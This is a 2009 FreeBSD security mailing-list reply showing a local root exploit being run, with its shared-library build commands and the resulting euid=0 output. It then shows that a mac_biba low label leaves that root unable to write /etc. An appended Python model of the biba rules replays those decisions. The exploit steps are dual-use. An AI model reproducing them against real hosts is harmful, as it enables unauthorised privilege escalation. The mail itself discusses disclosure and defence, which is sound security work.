Date:      Tue, 1 Dec 2009 18:41:07 +0100
From:      Borja Marcos <borjam@sarenet.es>
To:        freebsd-security@freebsd.org
Cc:        FreeBSD Security Advisories <security-advisories@freebsd.org>
Subject:   Re: Upcoming FreeBSD Security Advisory
Message-ID:  <CE6953AE-C4FD-4DD3-831D-ED4215A9AE93@sarenet.es>
In-Reply-To: <200912010120.nB11Kjm9087476@freefall.freebsd.org>
References:  <200912010120.nB11Kjm9087476@freefall.freebsd.org>


On Dec 1, 2009, at 2:20 AM, FreeBSD Security Officer wrote:

> A short time ago a "local root" exploit was posted to the full-disclosure
> mailing list; as the name suggests, this allows a local user to execute
> arbitrary code as root.

Dr. Strangelove, or How I learned to love the MAC subsystem.

# uname -a
FreeBSD test 7.2-RELEASE FreeBSD 7.2-RELEASE #0: Fri Nov 20 13:20:06 CET 2009
root@test:/usr/obj/usr/src/sys/TEST amd64


$ gcc -o program.o -c program.c -fPIC
$ gcc -shared -Wl,-soname,w00t.so.1 -o w00t.so.1.0 program.o -nostartfiles
$ ./env
/libexec/ld-elf.so.1: environment corrupt; missing value for 
/libexec/ld-elf.so.1: environment corrupt; missing value for 
/libexec/ld-elf.so.1: environment corrupt; missing value for 
/libexec/ld-elf.so.1: environment corrupt; missing value for 
/libexec/ld-elf.so.1: environment corrupt; missing value for 
ALEX-ALEX
# id
uid=1001(user) gid=1001(user) euid=0(root) groups=1001(portero),0(wheel)
# /usr/sbin/getpmac
biba/high(low-high)

And of course it's root.

Now,

$ setpmac biba/low\(low-low\) csh
%pwd
/tmp
%./env
/libexec/ld-elf.so.1: environment corrupt; missing value for 
/libexec/ld-elf.so.1: environment corrupt; missing value for 
/libexec/ld-elf.so.1: environment corrupt; missing value for 
/libexec/ld-elf.so.1: environment corrupt; missing value for 
/libexec/ld-elf.so.1: environment corrupt; missing value for 
ALEX-ALEX
# 
** OMG!! IT WORKED!!

BUT

# touch /etc/testing_the_exploit
touch: /etc/testing_the_exploit: Permission denied
# ls -l /usr/sbin/getpmac
-r-xr-xr-x  1 root  wheel  7144 May  1  2009 /usr/sbin/getpmac
# /usr/sbin/getpmac
biba/low(low-low)

OOHHHHH, we have a toothless root. Maybe a "riit"?


Pity these serious security mechanisms don't get widespread usage.






Borja.
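Added example, not part of Borja's mail or of FreeBSD's own mac_biba code: a small model of the mac_biba(4) integrity rules that replays the decisions in the transcript above. It shows why the second run ends with euid=0 but `touch /etc/...` is denied: the policy compares integrity labels, not user ids, and a process started with `setpmac biba/low(low-low)` can never write to a `biba/high` object or raise its own label back. The label grammar (`biba/<effective>[(<low>-<high>)]`, grades `low` < `0..65535` < `high`, optional compartments) follows mac_biba(4); the object labels for `/etc` and the starting shell label are constructed for the demo and assumed to be `biba/high` (consistent with the denied `touch` and the `getpmac` output in the mail).

```python
import re
from dataclasses import dataclass

# Grade ordering in mac_biba(4): low < 0 .. 65535 < high.
LOW, HIGH = -1, 65536


@dataclass(frozen=True)
class Grade:
    level: int
    compartments: frozenset = frozenset()

    def dominates(self, other: "Grade") -> bool:
        """Biba dominance: level >= other's level and compartments a superset."""
        return self.level >= other.level and self.compartments >= other.compartments


@dataclass(frozen=True)
class Label:
    effective: Grade
    low: Grade   # range bottom; for objects (no range) low == high == effective
    high: Grade


def parse_grade(text: str) -> Grade:
    """Parse 'low', 'high' or '<n>[:c1+c2...]' (compartments only on numeric grades)."""
    text = text.strip()
    if text == "low":
        return Grade(LOW)
    if text == "high":
        return Grade(HIGH)
    m = re.fullmatch(r"(\d+)(?::(\d+(?:\+\d+)*))?", text)
    if not m or not 0 <= int(m.group(1)) <= 65535:
        raise ValueError(f"bad Biba grade: {text!r}")
    comps = frozenset(int(c) for c in m.group(2).split("+")) if m.group(2) else frozenset()
    return Grade(int(m.group(1)), comps)


def parse_label(text: str) -> Label:
    """Parse 'biba/<eff>' or 'biba/<eff>(<low>-<high>)' as printed by getpmac(8)."""
    m = re.fullmatch(r"biba/([^()\s]+)(?:\(([^()-]+)-([^()-]+)\))?", text.strip())
    if not m:
        raise ValueError(f"bad Biba label: {text!r}")
    eff = parse_grade(m.group(1))
    if m.group(2) is None:
        return Label(eff, eff, eff)
    lo, hi = parse_grade(m.group(2)), parse_grade(m.group(3))
    if not (eff.dominates(lo) and hi.dominates(eff)):
        raise ValueError(f"effective grade outside its range: {text!r}")
    return Label(eff, lo, hi)


def biba_allows(op: str, subject: str, obj: str) -> bool:
    """Strict integrity: no read down (read/exec need object >= subject),
    no write up (write needs subject >= object). The caller's uid/euid is
    never consulted, which is exactly why euid=0 buys nothing at biba/low."""
    s, o = parse_label(subject).effective, parse_label(obj).effective
    if op in ("read", "exec"):
        return o.dominates(s)
    if op == "write":
        return s.dominates(o)
    raise ValueError(f"unknown operation: {op!r}")


def can_relabel(current: str, requested: str) -> bool:
    """setpmac(8) may only move a process to a label inside its current range."""
    cur, req = parse_label(current), parse_label(requested)
    return all(cur.high.dominates(g) and g.dominates(cur.low)
               for g in (req.effective, req.low, req.high))


def replay_transcript() -> dict:
    """Re-run the decisions from the mail. File labels are constructed for the
    demo: /etc is taken to be biba/high, as the denied touch implies."""
    etc = "biba/high"
    root_shell = "biba/high(low-high)"   # label getpmac printed in the first run
    low_shell = "biba/low(low-low)"      # label requested via setpmac in the second run
    return {
        "setpmac_to_low_allowed": can_relabel(root_shell, low_shell),
        "high_root_writes_etc": biba_allows("write", root_shell, etc),
        "low_root_writes_etc": biba_allows("write", low_shell, etc),    # touch: denied
        "low_root_runs_getpmac": biba_allows("exec", low_shell, etc),   # still runs
        "low_root_climbs_back_to_high": can_relabel(low_shell, root_shell),
    }


if __name__ == "__main__":
    for decision, allowed in replay_transcript().items():
        print(f"{decision}: {allowed}")
```

The last entry is the part that makes the "toothless root" stick: the range `(low-low)` means even a euid-0 process cannot use setpmac to climb back to `biba/high`, so the label is a one-way door for that process and its children.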